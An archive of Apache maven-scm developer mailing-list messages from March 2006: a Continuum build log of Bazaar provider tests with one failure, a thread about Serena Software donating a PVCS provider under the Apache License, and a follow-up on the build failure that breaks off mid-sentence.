>>------------------------------------------------------- >> T E S T S >>------------------------------------------------------- >>[surefire] Running org.apache.maven.scm.provider.bazaar.command.checkin.BazaarCheckInCommandTest >>EXECUTING: bzr init >>EXECUTING: bzr add /home/continuum/continuum-maven/working-directory/80/target/test-branch/pom.xml /home/continuum/continuum-maven/working-directory/80/target/test-branch/readme.txt /home/continuum/continuum-maven/working-directory/80/target/test-branch/src/main/java/Application.java /home/continuum/continuum-maven/working-directory/80/target/test-branch/src/test/java/Test.java >>EXECUTING: bzr commit --message "Add files to test branch" >>[INFO] Removing /home/continuum/continuum-maven/working-directory/80/target/scm-test/working-copy >>[INFO] EXECUTING: bzr branch /home/continuum/continuum-maven/working-directory/80/target/test-branch /home/continuum/continuum-maven/working-directory/80/target/scm-test/working-copy >>[INFO] EXECUTING: bzr inventory >>[INFO] EXECUTING: bzr add --no-recurse src/main/java/Foo.java >>[INFO] [src/main/java/Foo.java:added] >>[INFO] EXECUTING: bzr status >>[INFO] [src/main/java/Foo.java:added] >>[INFO] [readme.txt:modified] >>[INFO] [src/main/java/Bar.java:unknown] >>[INFO] EXECUTING: bzr commit --message "Commit message" >>[INFO] EXECUTING: bzr push /home/continuum/continuum-maven/working-directory/80/target/test-branch >>[INFO] Removing /home/continuum/continuum-maven/working-directory/80/target/scm-test/assertion-copy >>[INFO] EXECUTING: bzr branch /home/continuum/continuum-maven/working-directory/80/target/test-branch /home/continuum/continuum-maven/working-directory/80/target/scm-test/assertion-copy >>[INFO] EXECUTING: bzr inventory >>EXECUTING: bzr init >>EXECUTING: bzr add /home/continuum/continuum-maven/working-directory/80/target/test-branch/pom.xml /home/continuum/continuum-maven/working-directory/80/target/test-branch/readme.txt /home/continuum/continuum-maven/working-directory/80/target/test-branch/src/main/java/Application.java /home/continuum/continuum-maven/working-directory/80/target/test-branch/src/test/java/Test.java >>EXECUTING: bzr commit --message "Add files to test branch" >>[INFO] Removing /home/continuum/continuum-maven/working-directory/80/target/scm-test/working-copy >>[INFO] EXECUTING: bzr branch /home/continuum/continuum-maven/working-directory/80/target/test-branch /home/continuum/continuum-maven/working-directory/80/target/scm-test/working-copy >>[INFO] EXECUTING: bzr inventory >>[INFO] EXECUTING: bzr add --no-recurse src/main/java/Foo.java >>[INFO] [src/main/java/Foo.java:added] >>[INFO] EXECUTING: bzr commit --message "Commit message" src/main/java/Foo.java >>[INFO] EXECUTING: bzr push /home/continuum/continuum-maven/working-directory/80/target/test-branch >>[INFO] Removing /home/continuum/continuum-maven/working-directory/80/target/scm-test/assertion-copy >>[INFO] EXECUTING: bzr branch /home/continuum/continuum-maven/working-directory/80/target/test-branch /home/continuum/continuum-maven/working-directory/80/target/scm-test/assertion-copy >>[INFO] EXECUTING: bzr inventory >>[surefire] Tests run: 2, Failures: 0, Errors: 0, Time elapsed: 8.089 sec >>[surefire] Running org.apache.maven.scm.provider.bazaar.command.checkout.BazaarCheckOutCommandTest >>EXECUTING: bzr init >>EXECUTING: bzr add /home/continuum/continuum-maven/working-directory/80/target/test-branch/pom.xml /home/continuum/continuum-maven/working-directory/80/target/test-branch/readme.txt /home/continuum/continuum-maven/working-directory/80/target/test-branch/src/main/java/Application.java /home/continuum/continuum-maven/working-directory/80/target/test-branch/src/test/java/Test.java >>EXECUTING: bzr commit --message "Add files to test branch" >>[INFO] Removing /home/continuum/continuum-maven/working-directory/80/target/scm-test/working-copy >>[INFO] EXECUTING: bzr branch /home/continuum/continuum-maven/working-directory/80/target/test-branch /home/continuum/continuum-maven/working-directory/80/target/scm-test/working-copy >>[INFO] EXECUTING: bzr inventory >>[INFO] Removing /home/continuum/continuum-maven/working-directory/80/target/scm-test/working-copy >>[INFO] EXECUTING: bzr branch /home/continuum/continuum-maven/working-directory/80/target/test-branch /home/continuum/continuum-maven/working-directory/80/target/scm-test/working-copy >>[INFO] EXECUTING: bzr inventory >>[surefire] Tests run: 1, Failures: 0, Errors: 0, Time elapsed: 1.289 sec >>[surefire] Running org.apache.maven.scm.provider.bazaar.command.status.BazaarStatusCommandTest >>EXECUTING: bzr init >>EXECUTING: bzr add /home/continuum/continuum-maven/working-directory/80/target/test-branch/pom.xml /home/continuum/continuum-maven/working-directory/80/target/test-branch/readme.txt /home/continuum/continuum-maven/working-directory/80/target/test-branch/src/main/java/Application.java /home/continuum/continuum-maven/working-directory/80/target/test-branch/src/test/java/Test.java >>EXECUTING: bzr commit --message "Add files to test branch" >>[INFO] Removing /home/continuum/continuum-maven/working-directory/80/target/scm-test/working-copy >>[INFO] EXECUTING: bzr branch /home/continuum/continuum-maven/working-directory/80/target/test-branch /home/continuum/continuum-maven/working-directory/80/target/scm-test/working-copy >>[INFO] EXECUTING: bzr inventory >>[INFO] Removing /home/continuum/continuum-maven/working-directory/80/target/scm-test/updating-copy >>[INFO] EXECUTING: bzr branch /home/continuum/continuum-maven/working-directory/80/target/test-branch /home/continuum/continuum-maven/working-directory/80/target/scm-test/updating-copy >>[INFO] EXECUTING: bzr inventory >>[INFO] EXECUTING: bzr add --no-recurse project.xml >>[INFO] [project.xml:added] >>[INFO] EXECUTING: bzr status >>[INFO] [project.xml:added] >>[INFO] [readme.txt:modified] >>[INFO] EXECUTING: bzr commit --message "No msg" >>[INFO] EXECUTING: bzr push /home/continuum/continuum-maven/working-directory/80/target/test-branch >>[INFO] EXECUTING: bzr add --no-recurse src/test/java/org >>[INFO] [src/test/java/org:added] >>[INFO] EXECUTING: bzr add --no-recurse src/main/java/org >>[INFO] [src/main/java/org:added] >>[INFO] EXECUTING: bzr add --no-recurse src/main/java/org/Foo.java >>[INFO] [src/main/java/org/Foo.java:added] >>[INFO] EXECUTING: bzr status >>[INFO] New directory added: /home/continuum/continuum-maven/working-directory/80/target/scm-test/updating-copy/src/main/java/org >>[INFO] [src/main/java/org/Foo.java:added] >>[INFO] New directory added: /home/continuum/continuum-maven/working-directory/80/target/scm-test/updating-copy/src/test/java/org >>[INFO] [pom.xml:modified] >>[surefire] Tests run: 1, Failures: 0, Errors: 0, Time elapsed: 2.921 sec >>[surefire] Running org.apache.maven.scm.provider.bazaar.command.diff.BazaarDiffCommandTest >>EXECUTING: bzr init >>EXECUTING: bzr add /home/continuum/continuum-maven/working-directory/80/target/test-branch/pom.xml /home/continuum/continuum-maven/working-directory/80/target/test-branch/readme.txt /home/continuum/continuum-maven/working-directory/80/target/test-branch/src/main/java/Application.java /home/continuum/continuum-maven/working-directory/80/target/test-branch/src/test/java/Test.java >>EXECUTING: bzr commit --message "Add files to test branch" >>[INFO] Removing /home/continuum/continuum-maven/working-directory/80/target/scm-test/working-copy >>[INFO] EXECUTING: bzr branch /home/continuum/continuum-maven/working-directory/80/target/test-branch /home/continuum/continuum-maven/working-directory/80/target/scm-test/working-copy >>[INFO] EXECUTING: bzr inventory >>[INFO] EXECUTING: bzr add --no-recurse project.xml >>[INFO] [project.xml:added] >>[INFO] EXECUTING: bzr add --no-recurse src/test/java/org >>[INFO] [src/test/java/org:added] >>[INFO] EXECUTING: bzr add --no-recurse src/main/java/org >>[INFO] [src/main/java/org:added] >>[INFO] EXECUTING: bzr add --no-recurse src/main/java/org/Foo.java >>[INFO] [src/main/java/org/Foo.java:added] >>[INFO] EXECUTING: bzr diff >>[surefire] Tests run: 1, Failures: 0, Errors: 0, Time elapsed: 1.761 sec >>[surefire] Running org.apache.maven.scm.provider.bazaar.command.update.BazaarUpdateCommandTest >>EXECUTING: bzr init >>EXECUTING: bzr add /home/continuum/continuum-maven/working-directory/80/target/test-branch/pom.xml /home/continuum/continuum-maven/working-directory/80/target/test-branch/readme.txt /home/continuum/continuum-maven/working-directory/80/target/test-branch/src/main/java/Application.java /home/continuum/continuum-maven/working-directory/80/target/test-branch/src/test/java/Test.java >>EXECUTING: bzr commit --message "Add files to test branch" >>[INFO] Removing /home/continuum/continuum-maven/working-directory/80/target/scm-test/working-copy >>[INFO] EXECUTING: bzr branch /home/continuum/continuum-maven/working-directory/80/target/test-branch /home/continuum/continuum-maven/working-directory/80/target/scm-test/working-copy >>[INFO] EXECUTING: bzr inventory >>[INFO] Removing /home/continuum/continuum-maven/working-directory/80/target/scm-test/updating-copy >>[INFO] EXECUTING: bzr branch /home/continuum/continuum-maven/working-directory/80/target/test-branch /home/continuum/continuum-maven/working-directory/80/target/scm-test/updating-copy >>[INFO] EXECUTING: bzr inventory >>[INFO] EXECUTING: bzr add --no-recurse project.xml >>[INFO] [project.xml:added] >>[INFO] EXECUTING: bzr add --no-recurse src/test/java/org >>[INFO] [src/test/java/org:added] >>[INFO] EXECUTING: bzr add --no-recurse src/main/java/org >>[INFO] [src/main/java/org:added] >>[INFO] EXECUTING: bzr add --no-recurse src/main/java/org/Foo.java >>[INFO] [src/main/java/org/Foo.java:added] >>[INFO] EXECUTING: bzr status >>[INFO] [project.xml:added] >>[INFO] New directory added: /home/continuum/continuum-maven/working-directory/80/target/scm-test/working-copy/src/main/java/org >>[INFO] [src/main/java/org/Foo.java:added] >>[INFO] New directory added: /home/continuum/continuum-maven/working-directory/80/target/scm-test/working-copy/src/test/java/org >>[INFO] [readme.txt:modified] >>[INFO] EXECUTING: bzr commit --message "No msg" >>[INFO] EXECUTING: bzr push /home/continuum/continuum-maven/working-directory/80/target/test-branch >>[INFO] EXECUTING: bzr pull >>[INFO] EXECUTING: bzr revno >>[INFO] EXECUTING: bzr diff --revision 1 >>[INFO] EXECUTING: bzr log --verbose >> <changelog-entry> >> <date pattern="yyyy-MM-dd">2006-03-28</date> >> <time pattern="HH:mm:ss">05:05:38</time> >> <author><![CDATA[continuum <[email protected]>]]></author> >> <file> >> <name>project.xml</name> >> <revision>2</revision> >> </file> >> <file> >> <name>src/main/java/org/</name> >> <revision>2</revision> >> </file> >> <file> >> <name>src/main/java/org/Foo.java</name> >> <revision>2</revision> >> </file> >> <file> >> <name>src/test/java/org/</name> >> <revision>2</revision> >> </file> >> <file> >> <name>readme.txt</name> >> <revision>2</revision> >> </file> >> <msg><![CDATA[No msg]]></msg> >> </changelog-entry> >> >>[surefire] Tests run: 1, Failures: 0, Errors: 0, Time elapsed: 4.862 sec >>[surefire] Running org.apache.maven.scm.provider.bazaar.command.changelog.BazaarChangeLogCommandTckTest >>EXECUTING: bzr init >>EXECUTING: bzr add /home/continuum/continuum-maven/working-directory/80/target/test-branch/pom.xml /home/continuum/continuum-maven/working-directory/80/target/test-branch/readme.txt /home/continuum/continuum-maven/working-directory/80/target/test-branch/src/main/java/Application.java /home/continuum/continuum-maven/working-directory/80/target/test-branch/src/test/java/Test.java >>EXECUTING: bzr commit --message "Add files to test branch" >>[INFO] Removing /home/continuum/continuum-maven/working-directory/80/target/scm-test/working-copy >>[INFO] EXECUTING: bzr branch /home/continuum/continuum-maven/working-directory/80/target/test-branch /home/continuum/continuum-maven/working-directory/80/target/scm-test/working-copy >>[INFO] EXECUTING: bzr inventory >>[INFO] EXECUTING: bzr log --verbose >>[INFO] EXECUTING: bzr status >>[INFO] [readme.txt:modified] >>[INFO] EXECUTING: bzr commit --message "Second changelog" >>[INFO] EXECUTING: bzr push /home/continuum/continuum-maven/working-directory/80/target/test-branch >>[INFO] EXECUTING: bzr log --verbose >>[INFO] EXECUTING: bzr log --verbose >>[surefire] Tests run: 1, Failures: 1, Errors: 0, Time elapsed: 3.115 sec <<<<<<<< FAILURE !! >>[surefire] Running org.apache.maven.scm.provider.bazaar.command.changelog.BazaarChangeLogConsumerTest >>[surefire] Tests run: 1, Failures: 0, Errors: 0, Time elapsed: 0.031 sec >>[INFO] ---------------------------------------------------------------------------- >>[ERROR] BUILD ERROR >>[INFO] ---------------------------------------------------------------------------- >>[INFO] There are test failures. >>[INFO] ---------------------------------------------------------------------------- >>[INFO] For more information, run Maven with the -e switch >>[INFO] ---------------------------------------------------------------------------- >>[INFO] Total time: 28 seconds >>[INFO] Finished at: Tue Mar 28 05:05:42 PST 2006 >>[INFO] Final Memory: 7M/159M >>[INFO] ---------------------------------------------------------------------------- >> >>**************************************************************************** >> >> > > > > From [email protected] Tue Mar 28 19:24:12 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 33684 invoked from network); 28 Mar 2006 19:24:10 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 28 Mar 2006 19:24:10 -0000 Received: (qmail 64112 invoked by uid 500); 28 Mar 2006 19:24:09 -0000 Delivered-To: [email protected] Received: (qmail 64058 invoked by uid 500); 28 Mar 2006 19:24:09 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: [email protected] List-Id: <scm-dev.maven.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 64047 invoked by uid 99); 28 Mar 2006 19:24:09 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 28 Mar 2006 11:24:09 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO webmail9.amenworld.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Tue, 28 Mar 2006 11:24:07 -0800 Received: (qmail 18410 invoked from network); 28 Mar 2006 19:23:46 -0000 Received: from 90.20.99-84.rev.gaoland.net (HELO ?161.129.204.104?) (161.129.204.104) by 0 with SMTP; 28 Mar 2006 19:23:46 -0000 Message-ID: <[email protected]> Date: Tue, 28 Mar 2006 21:23:38 +0200 From: Emmanuel Venisse <[email protected]> User-Agent: Mozilla Thunderbird 1.0.6 (Windows/20050716) X-Accept-Language: fr, en MIME-Version: 1.0 To: [email protected] CC: David Parker <[email protected]>, Francis Long <[email protected]>, [email protected] Subject: Re: PVCS and Maven References: <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=windows-1252; format=flowed Content-Transfer-Encoding: 8bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Hi, Do you have implemented maven-scm interfaces for PVCS? You can create an issue (http://jira.codehaus.org/browse/SCM) and attach your code to it. You can subscribe too scm developers list (little traffic) so you'll can help users that want to use your provider. If you have any questions about maven-scm, don't hesitate to send a mail to developers list. Emmanuel Kevin Parker a écrit : > Dear Maven's, > > We have recently developed a Maven interface for our PVCS product and > are interested in the process for potentially donating this to the > project. Could someone contact me and let me know what the process would be. > > Sincerely, > > *//**//**//**/Kevin > /**//**//**/ > /****Kevin Parker**** > *///Vice President//////// Market Development//// > /***Serena Software Inc*. > 2755 Campus Drive, 3^rd Floor, San Mateo, CA 94403-2538 > ***www.serena.com**** > *tel 480-986-8231 > fax 480-986-8231 > cell 480-986-8231 > email [email protected] > > > > ********************************************************************** > This email and any files transmitted with it are confidential and > intended solely for the use of the individual or entity to whom they > are addressed. Any unauthorized review, use, disclosure or distribution > is prohibited. If you are not the intended recipient, please contact the > sender by reply e-mail and destroy all copies of the original message. From [email protected] Tue Mar 28 19:45:39 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 43706 invoked from network); 28 Mar 2006 19:45:38 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 28 Mar 2006 19:45:38 -0000 Received: (qmail 90070 invoked by uid 500); 28 Mar 2006 19:45:38 -0000 Delivered-To: [email protected] Received: (qmail 90056 invoked by uid 500); 28 Mar 2006 19:45:38 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: [email protected] List-Id: <scm-dev.maven.apache.org> Delivered-To: mailing list [email protected] Delivered-To: moderator for [email protected] Received: (qmail 83434 invoked by uid 99); 28 Mar 2006 19:43:42 -0000 X-ASF-Spam-Status: No, hits=1.6 required=10.0 tests=ADVANCE_FEE_1,DEAR_SOMETHING,SPF_PASS,UNPARSEABLE_RELAY X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: domain of [email protected] designates 161.129.204.104 as permitted sender) X-MimeOLE: Produced By Microsoft Exchange V6.5 Content-class: urn:content-classes:message MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Subject: RE: PVCS and Maven Date: Tue, 28 Mar 2006 11:43:33 -0800 Message-ID: <[email protected]> X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: PVCS and Maven Thread-Index: AcZSnSTCmgZ1bcCHRra0UO5ttEljowAAq2Ng From: "Kevin Parker" <[email protected]> To: "Emmanuel Venisse" <[email protected]>, <[email protected]> Cc: "David Parker" <[email protected]>, "Francis Long" <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Dear Sir, Thank you. Once we have approval to donate the code we will follow the = process you suggested. Sincerely, Kevin Kevin Parker Vice President Market Development Serena Software Inc.=20 2755 Campus Drive, 3rd Floor, San Mateo, CA 94403-2538 www.serena.com=20 tel 480-986-8231 fax 480-986-8231 cell 480-986-8231 email [email protected] -----Original Message----- From: Emmanuel Venisse [mailto:[email protected]]=20 Sent: Tuesday, March 28, 2006 11:24 To: [email protected] Cc: David Parker; Francis Long; Kevin Parker Subject: Re: PVCS and Maven Hi, Do you have implemented maven-scm interfaces for PVCS? You can create an issue (http://jira.codehaus.org/browse/SCM) and attach = your code to it. You can subscribe too scm developers list (little traffic) so you'll can = help users that want to use=20 your provider. If you have any questions about maven-scm, don't hesitate to send a mail = to developers list. Emmanuel Kevin Parker a =E9crit : > Dear Maven's, >=20 > We have recently developed a Maven interface for our PVCS product and=20 > are interested in the process for potentially donating this to the=20 > project. Could someone contact me and let me know what the process = would be. >=20 > Sincerely, >=20 > *//**//**//**/Kevin > /**//**//**/ > /****Kevin Parker**** > *///Vice President//////// Market Development//// > /***Serena Software Inc*. > 2755 Campus Drive, 3^rd Floor, San Mateo, CA 94403-2538 > ***www.serena.com**** > *tel 480-986-8231 > fax 480-986-8231 > cell 480-986-8231 > email [email protected] >=20 >=20 >=20 > ********************************************************************** > This email and any files transmitted with it are confidential and > intended solely for the use of the individual or entity to whom they > are addressed. Any unauthorized review, use, disclosure or = distribution=20 > is prohibited. If you are not the intended recipient, please contact = the=20 > sender by reply e-mail and destroy all copies of the original message. From [email protected] Tue Mar 28 19:49:52 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 45187 invoked from network); 28 Mar 2006 19:49:52 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 28 Mar 2006 19:49:52 -0000 Received: (qmail 93031 invoked by uid 500); 28 Mar 2006 19:49:52 -0000 Delivered-To: [email protected] Received: (qmail 93009 invoked by uid 500); 28 Mar 2006 19:49:52 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: [email protected] List-Id: <scm-dev.maven.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 92998 invoked by uid 99); 28 Mar 2006 19:49:51 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 28 Mar 2006 11:49:51 -0800 X-ASF-Spam-Status: No, hits=1.6 required=10.0 tests=ADVANCE_FEE_1,DEAR_SOMETHING X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO webmail9.amenworld.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Tue, 28 Mar 2006 11:49:51 -0800 Received: (qmail 13746 invoked from network); 28 Mar 2006 19:49:30 -0000 Received: from 90.20.99-84.rev.gaoland.net (HELO ?161.129.204.104?) (161.129.204.104) by 0 with SMTP; 28 Mar 2006 19:49:30 -0000 Message-ID: <[email protected]> Date: Tue, 28 Mar 2006 21:49:24 +0200 From: Emmanuel Venisse <[email protected]> User-Agent: Mozilla Thunderbird 1.0.6 (Windows/20050716) X-Accept-Language: fr, en MIME-Version: 1.0 To: [email protected] CC: David Parker <[email protected]>, Francis Long <[email protected]>, [email protected] Subject: Re: PVCS and Maven References: <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 8bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Thank you. Emmanuel Kevin Parker a écrit : > Dear Sir, > > Thank you. Once we have approval to donate the code we will follow the process you suggested. > > Sincerely, > > Kevin > > Kevin Parker > Vice President Market Development > Serena Software Inc. > 2755 Campus Drive, 3rd Floor, San Mateo, CA 94403-2538 > www.serena.com > tel 480-986-8231 > fax 480-986-8231 > cell 480-986-8231 > email [email protected] > > > -----Original Message----- > From: Emmanuel Venisse [mailto:[email protected]] > Sent: Tuesday, March 28, 2006 11:24 > To: [email protected] > Cc: David Parker; Francis Long; Kevin Parker > Subject: Re: PVCS and Maven > > Hi, > > Do you have implemented maven-scm interfaces for PVCS? > You can create an issue (http://jira.codehaus.org/browse/SCM) and attach your code to it. > You can subscribe too scm developers list (little traffic) so you'll can help users that want to use > your provider. > > If you have any questions about maven-scm, don't hesitate to send a mail to developers list. > > Emmanuel > > Kevin Parker a écrit : > >>Dear Maven's, >> >>We have recently developed a Maven interface for our PVCS product and >>are interested in the process for potentially donating this to the >>project. Could someone contact me and let me know what the process would be. >> >>Sincerely, >> >>*//**//**//**/Kevin >>/**//**//**/ >>/****Kevin Parker**** >>*///Vice President//////// Market Development//// >>/***Serena Software Inc*. >>2755 Campus Drive, 3^rd Floor, San Mateo, CA 94403-2538 >>***www.serena.com**** >>*tel 480-986-8231 >>fax 480-986-8231 >>cell 480-986-8231 >>email [email protected] >> >> >> >>********************************************************************** >>This email and any files transmitted with it are confidential and >>intended solely for the use of the individual or entity to whom they >>are addressed. Any unauthorized review, use, disclosure or distribution >>is prohibited. If you are not the intended recipient, please contact the >>sender by reply e-mail and destroy all copies of the original message. > > > > > From [email protected] Tue Mar 28 20:09:32 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 53194 invoked from network); 28 Mar 2006 20:09:32 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 28 Mar 2006 20:09:32 -0000 Received: (qmail 18578 invoked by uid 500); 28 Mar 2006 20:09:31 -0000 Delivered-To: [email protected] Received: (qmail 18555 invoked by uid 500); 28 Mar 2006 20:09:31 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: [email protected] List-Id: <scm-dev.maven.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 18544 invoked by uid 99); 28 Mar 2006 20:09:31 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 28 Mar 2006 12:09:31 -0800 X-ASF-Spam-Status: No, hits=1.6 required=10.0 tests=ADVANCE_FEE_1,DEAR_SOMETHING X-Spam-Check-By: apache.org Received-SPF: neutral (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO mail-ihug.icp-qv1-irony4.iinet.net.au) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 28 Mar 2006 12:09:30 -0800 Received: from 203-206-247-19.dyn.iinet.net.au (HELO [161.129.204.104]) ([161.129.204.104]) by mail-ihug.icp-qv1-irony4.iinet.net.au with ESMTP; 29 Mar 2006 04:09:09 +0800 X-BrightmailFiltered: true X-Brightmail-Tracker: AAAAAA== X-IronPort-AV: i="4.03,139,1141574400"; d="scan'208"; a="677097204:sNHT23540748" Message-ID: <[email protected]> Date: Wed, 29 Mar 2006 07:09:01 +1100 From: Brett Porter <[email protected]> User-Agent: Thunderbird 1.5 (Windows/20051201) MIME-Version: 1.0 To: [email protected] CC: Emmanuel Venisse <[email protected]>, David Parker <[email protected]>, Francis Long <[email protected]> Subject: Re: PVCS and Maven References: <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Thanks for contacting us. This is certainly welcome - nobody is better positioned to write this code than you are, and that is a good thing for users of PVCS that use Maven and/or Continuum. I'd just like to add that we can only accept code donations that are licensed under the Apache License 2.0 (http://www.apache.org/licenses/LICENSE-2.0.txt), and it may be necessary to execute a software grant (http://www.apache.org/licenses/software-grant.txt) to go along with the contribution. Hopefully, these shouldn't be an obstacle. As Emmanuel said, we certainly look forward to hearing more from you on the the [email protected] list. We're more than happy to answer any further questions you have. Regards, Brett Kevin Parker wrote: > Dear Sir, > > Thank you. Once we have approval to donate the code we will follow the process you suggested. > > Sincerely, > > Kevin > > Kevin Parker > Vice President Market Development > Serena Software Inc. > 2755 Campus Drive, 3rd Floor, San Mateo, CA 94403-2538 > www.serena.com > tel 480-986-8231 > fax 480-986-8231 > cell 480-986-8231 > email [email protected] > > > -----Original Message----- > From: Emmanuel Venisse [mailto:[email protected]] > Sent: Tuesday, March 28, 2006 11:24 > To: [email protected] > Cc: David Parker; Francis Long; Kevin Parker > Subject: Re: PVCS and Maven > > Hi, > > Do you have implemented maven-scm interfaces for PVCS? > You can create an issue (http://jira.codehaus.org/browse/SCM) and attach your code to it. > You can subscribe too scm developers list (little traffic) so you'll can help users that want to use > your provider. > > If you have any questions about maven-scm, don't hesitate to send a mail to developers list. > > Emmanuel > > Kevin Parker a écrit : >> Dear Maven's, >> >> We have recently developed a Maven interface for our PVCS product and >> are interested in the process for potentially donating this to the >> project. Could someone contact me and let me know what the process would be. >> >> Sincerely, >> >> *//**//**//**/Kevin >> /**//**//**/ >> /****Kevin Parker**** >> *///Vice President//////// Market Development//// >> /***Serena Software Inc*. >> 2755 Campus Drive, 3^rd Floor, San Mateo, CA 94403-2538 >> ***www.serena.com**** >> *tel 480-986-8231 >> fax 480-986-8231 >> cell 480-986-8231 >> email [email protected] >> >> >> >> ********************************************************************** >> This email and any files transmitted with it are confidential and >> intended solely for the use of the individual or entity to whom they >> are addressed. Any unauthorized review, use, disclosure or distribution >> is prohibited. If you are not the intended recipient, please contact the >> sender by reply e-mail and destroy all copies of the original message. > From [email protected] Wed Mar 29 09:16:56 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 34044 invoked from network); 29 Mar 2006 09:15:53 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 29 Mar 2006 09:15:52 -0000 Received: (qmail 98043 invoked by uid 500); 29 Mar 2006 09:15:17 -0000 Delivered-To: [email protected] Received: (qmail 98021 invoked by uid 500); 29 Mar 2006 09:15:16 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: [email protected] List-Id: <scm-dev.maven.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 98010 invoked by uid 99); 29 Mar 2006 09:15:16 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 29 Mar 2006 01:15:16 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests=UNPARSEABLE_RELAY X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO mail.slb.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 29 Mar 2006 01:15:14 -0800 Received: from pmxchannel_int-daemon.eurmta01.london.eur.slb.com by eurmta01.london.eur.slb.com (iPlanet Messaging Server 5.2 Patch 2 (built Jul 14 2004)) id <[email protected]> for [email protected]; Wed, 29 Mar 2006 09:10:04 +0000 (GMT) Received: from gb0135clu01.mail.slb.com (gb0135clu01.mail.slb.com [161.129.204.104]) by eurmta01.london.eur.slb.com (iPlanet Messaging Server 5.2 Patch 2 (built Jul 14 2004)) with ESMTP id <[email protected]> for [email protected]; Wed, 29 Mar 2006 09:09:49 +0000 (GMT) Received: from pmxchannel-daemon.gb0135mbx01.mail.slb.com by gb0135mbx01.mail.slb.com (Sun Java System Messaging Server 6.2-1 (built Feb 24 2005)) id <[email protected]> for [email protected]; Wed, 29 Mar 2006 09:09:48 +0000 (GMT) Received: from TSMOERGRAVOFS ([161.129.204.104]) by gb0135mbx01.mail.slb.com (Sun Java System Messaging Server 6.2-1 (built Feb 24 2005)) with ESMTPSA id <[email protected]> for [email protected]; Wed, 29 Mar 2006 09:09:41 +0000 (GMT) Date: Wed, 29 Mar 2006 11:09:40 +0200 From: =?iso-8859-1?Q?Torbj=F8rn_Sm=F8rgrav?= <[email protected]> Subject: RE: [continuum] BUILD FAILURE: Maven SCM Bazaar Provider In-reply-to: <[email protected]> To: [email protected] Message-id: <[email protected]> MIME-version: 1.0 X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2900.2180 X-Mailer: Microsoft Outlook IMO, Build 9.0.6604 (9.0.2911.0) Content-type: text/plain; charset=iso-8859-1 Content-transfer-encoding: 8BIT Importance: Normal X-Priority: 3 (Normal) X-MSMail-priority: Normal X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N I tried to build the provider with continuum and reproduced the failure once. After that initital failure - everything works fine. I also reproduced it 